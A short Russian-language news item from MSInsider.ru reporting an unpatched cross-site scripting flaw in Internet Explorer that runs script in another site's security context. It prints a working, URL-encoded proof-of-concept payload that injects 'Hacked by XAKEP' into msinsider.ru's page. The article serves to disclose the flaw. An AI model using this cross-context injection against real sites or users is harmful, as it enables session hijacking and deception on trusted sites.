Передать на печать

В Internet Explorer обнаружена новая XSS-уязвимость

Сегодня появилась информация об обнаружении новой XSS-уязвимости в браузере Internet Explorer, которая позволяет злоумышленнику выполнять произвольный JavaScript код в браузере жертвы в контексте безопасности произвольного сайта. Таким образом может быть использован доверенный сайт, вроде сайта Microsoft или Google.

Для использования этой уязвимости, которая пока не имеет способов для устранения, необходимо, чтобы пользователь зашел на сайт с определенным кодом и перешел по ссылке на сайт в контексте которого и будет исполнен сценарий.

После того, как пользователь нажмет на ссылку и выполнится код приведенный ниже, пользователь перейдет на сайт msinsider.ru и получит сообщение "Hacked by XAKEP". Данная надпись будет сформирована сценарием не от имени сайта на котором находилась ссылка и данный код, а от имени сайта msinsider.ru, который возможно является доверенным сайтом в вашем браузере.





Вот пример кода:

function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20XAKEP%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.msinsider.ru%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000);

  Передать на печать





Все права принадлежат © MSInsider.ru и TheVista.ru, 2013
Сайт является источником уникальной информации о семействе операционных систем Windows и других продуктах Microsoft. Перепечатка материалов возможна только с разрешения редакции.
Работает на WMS 1.1 (Страница создана за 0.049 секунд)